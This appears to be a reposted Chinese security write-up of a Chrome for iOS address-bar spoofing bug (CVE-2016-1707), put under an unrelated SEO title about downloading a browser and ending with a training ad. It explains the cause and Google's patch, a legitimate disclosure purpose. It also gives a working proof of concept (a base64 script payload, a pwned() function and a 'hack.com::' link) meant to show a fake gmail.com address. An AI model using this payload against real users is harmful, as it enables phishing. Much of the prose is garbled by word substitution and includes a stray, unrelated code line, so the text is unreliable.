谷歌欣赏 器电脑 - 谷歌欣赏 器电脑版怎么下载（推荐使用谷歌浏览器进行观看）

　　导语

　　Chrome欣赏 器地点 栏诱骗 弊端 (CVE-2016-1707)，这个弊端 笔者于2016年6月陈诉 给Google，如今 把弊端 细节分享给各人 。URL Spoofing弊端 可以伪造一个合法 的网站地点 。攻击者可以利用 这个弊端 对用户发起网络垂纶 攻击。

　　受影响版本：

　　Chrome v52.0.2743.82，IOS v10

　　弊端 详情

　　POC:

　　payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";

　　functionpwned() {

　　vart = window.open('https://www.gmail.com/', 'aaaa');

　　t.document.write(atob(payload));

　　t.document.write("h1Address bar says [url]https://www.gmail.com/[/url] - this is NOT [url]https://www.gmail.com//h1[/url]");

　　}

　　/

　　a href="https://hack.com::/"target="aaaa"click me/abr

　　那么这个弊端 是怎样 发生的呢？笔者如今 来解读一下整个代码的加载过程。起首 点击click me这个链接，欣赏 器去打开一个name为aaaa的新窗口，这个页面去加载“https://hack.com::”，这个地点 可以任意 写。500微秒后运行pwned()，在aaaa窗口打开https://www.gmail.com，固然 这个URL可以为空。到如今 为止，统统 代码运行都很正常，接下来这段代码就是触发弊端 的核心 代码。

　　加密的这段代码：

　　 payload code:

　　接下来这段代开始在aaaa窗口页面去提交（commit）https://gmail.com::，这是一个很奥妙 的事变 ，https://gmail.com::本是一个无效的地点 ，怎样 去被提交呢。在实行 了多种方法后，笔者发现利用 a标签点击的方式可以做到（window.open/location则不可以），而且 使这个无效地点 处在了一个等待 状态(pending status)。此时，实际 Chrome是加载了about:blank（已经到了about:blank域），但在处理 惩罚 末了 URL地点 栏中的表现 时，Chrome却选择了处在等待 状态的https://gmail.com:: 作为末了 的提交地点 ，加载后的https://gmail.com::在URL地点 栏中会以https://gmail.com如许 的方式出现 ，两个::会被隐蔽 。此时，整个加载过程完成。一个美满 的URL Spoofing弊端 就如许 产生了。

　　Online demo:

　　https://xisigr.com/test/spoof/chrome/1.html

　　https://xisigr.com/test/spoof/chrome/2.html

　　假如 你还没有升级版本，Chrome v52.0.2743.82，IOS v10，那么可以实行 运行笔者网站上的这两个DEMO。

　　怎样 修复

　　这个弊端 最关键的地方是，Chrome答应 在Web页面加载的时间 ，提交一个无效的地点 所导致。Google也是基于此给出了补丁文件，就是在加载Web页面的时间 不答应 提交无效地点 ，假如 检测到是无效地点 ，则直接使当前URL为about:blank。

　　[self optOutScrollsToTopForSubviews];

　　相干 链接

　　[1] https://googlechromereleases.blo ... channel-update.html

　　[2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183

　　[3] https://chromium.googlesource.co ... 6c88304ec504e909fd5

　　作者：xisigr

　　来自：腾讯玄武实行 室

炼石信息安全培训春季班开招

QQ：495066536

372806985

敬请连续 关注……